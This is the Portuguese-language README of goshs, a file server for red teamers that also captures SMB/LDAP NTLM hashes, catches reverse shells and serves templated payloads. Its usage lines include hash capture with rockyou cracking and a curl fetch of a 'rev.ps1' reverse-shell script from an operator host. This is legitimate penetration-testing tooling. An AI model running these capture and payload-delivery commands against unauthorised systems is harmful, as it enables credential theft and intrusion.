
Servidor de arquivos rico em recursos em um único binário para red teamers e desenvolvedores. HTTP/S · WebDAV · FTP/SFTP · SMB · LDAP/S · captura de hash NTLM · callbacks DNS/SMTP · TLS · Autenticação · Links de compartilhamento. Uma poderosa substituição para python3 -m http.server.
Você está no meio de um engajamento. Precisa transferir um arquivo, capturar um hash SMB ou montar rapidamente um servidor HTTPS — e python3 -m http.server não vai resolver.
goshs é um servidor de arquivos em um único binário, feito para os momentos em que você precisa de mais que o SimpleHTTPServer do Python, mas não quer configurar o Apache. HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S, autenticação básica, links de compartilhamento, callbacks DNS/SMTP, captura e cracking de hashes NTLM — tudo em um único comando.


Experimente você mesmo: demo.goshs.de

# Serve o diretório atual na porta 8000
goshs
# Serve com HTTPS (autoassinado) e autenticação básica
goshs -s -ss -b usuario:senha
# Captura hashes SMB
goshs -smb -smb-domain CORP
# Captura credenciais LDAP e hashes NTLM (com cracking opcional via wordlist)
goshs -ldap
goshs -ldap -ldap-wordlist /usr/share/wordlists/rockyou.txt
# Captura callbacks DNS e recebe e-mails
goshs -dns -dns-ip 1.2.3.4 -smtp -smtp-domain seu-dominio.com
# Autodestruição após 2 horas
goshs --ttl 2h
# Executa com o painel interativo no terminal (ótimo para sessões SSH headless)
goshs --tui
# Serve payloads que preenchem automaticamente seu host/porta de callback no momento do download
goshs -i 10.10.14.7 --template --tpl-var LPORT=4444
# busca renderizado: curl 'http://10.10.14.7:8000/rev.ps1?tpl'
Para uma documentação detalhada, acesse docs.goshs.de
O goshs pode instalar a conclusão por tab para bash, fish e zsh:
goshs --completion bash
goshs --completion fish
goshs --completion zsh
No macOS com Homebrew, o caminho correto do Homebrew é usado automaticamente. Após a instalação, o comando imprime uma instrução exata de ativação, por exemplo:
source ~/.local/share/bash-completion/completions/goshs
Os ativos web empacotados estão no repositório, então uma compilação simples funciona:
git clone https://github.com/goshs-labs/goshs.git
cd goshs
go build -o goshs .
Se você alterar as fontes JavaScript ou SCSS, reconstrua os ativos primeiro com esbuild e sass instalados:
make generate
go build -o goshs .
Estes são os incríveis contribuidores que tornaram o goshs ainda mais seguro ❤️
Entre na comunidade do Discord e comece a se conectar.
Um agradecimento especial vai para sc0tfree por inspirar este projeto com seu projeto updog escrito em Python.
| 📁 Operações com Arquivos | Download (com retomada e busca via HTTP Range), upload (arrastar e soltar, POST/PUT), exclusão, ZIP em lote, QR codes |
| 🔌 Protocolos | HTTP/S, WebDAV, FTP/SFTP, SMB, LDAP/S |
| 🔒 Autenticação e Segurança | Autenticação básica, autenticação por certificado, TLS (autoassinado, Let's Encrypt, certificado personalizado), whitelist de IP, ACLs baseadas em arquivos |
| ⚙️ Modos de Servidor | Somente leitura, somente upload, sem exclusão, silencioso, invisível, execução de comandos via CLI, autodestruição por TTL |
| 🔗 Links de Compartilhamento | Compartilhamento baseado em token, limite de downloads, limite de tempo |
| 🎯 Colaboração / CTF | Servidor DNS, servidor SMTP, captura de hashes NTLM do SMB + cracking, captura de credenciais LDAP + cracking de hashes NTLM (modo JNDI para Log4Shell), endpoint de redirecionamento, Capturador de Reverse Shell + gerador de payload |
| 🧩 Templating de Payloads | Renderize {{.LHOST}}/{{.LPORT}} + valores personalizados --tpl-var em arquivos servidos sob demanda (?tpl) |
| 🔔 Integração | Webhooks, túnel via localhost.run, arquivo de configuração, API JSON, mDNS |
| 🖥️ Painel TUI | Painel interativo em tela cheia no terminal; painéis ao vivo para HTTP, DNS, SMB, LDAP, SMTP, reverse shells e área de transferência; anexe e faça upgrade de shells diretamente do terminal |
| 🛠️ Diversos | Temas claro/escuro, área de transferência, autoatualização, saída de log, incorporação de arquivos, redução de privilégios |
| Método |
|---|
| 🐧 curl | sh | curl -sSfL https://goshs.de/install.sh | sh |
| 🦫 Go | go install goshs.de/goshs/v2@latest |
| 🐉 Kali & Parrot OS | sudo apt install goshs |
| 🎗️ Arch Linux (AUR) | yay -S goshs-bin |
| 🖤 BlackArch | pacman -S goshs |
| 🏔️ Alpine Linux (edge) | apk add goshs |
| 🫙 Snap | snap install goshs |
| 🎩 Fedora / RHEL (COPR) | dnf copr enable goshs-labs/goshs && dnf install goshs |
| 🦎 openSUSE | sudo zypper install goshs |
| ❄️ Nix / NixOS | nix-env -iA nixpkgs.goshs |
| 🍺 Homebrew | brew install goshs |
| 🪟 Scoop | scoop bucket add extras && scoop install extras/goshs |
| 🪟 winget | winget install GoshsLabs.Goshs |
| 🍫 Chocolatey | choco install goshs |
| 🐳 Docker | docker run --rm -it -p 8000:8000 -v "$PWD:/pwd" goshs-labs/goshs:latest -d /pwd |
| 📦 Release | Baixe dos Lançamentos no GitHub |
![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | ![]() | wooseokdotkim | Guilhem7 |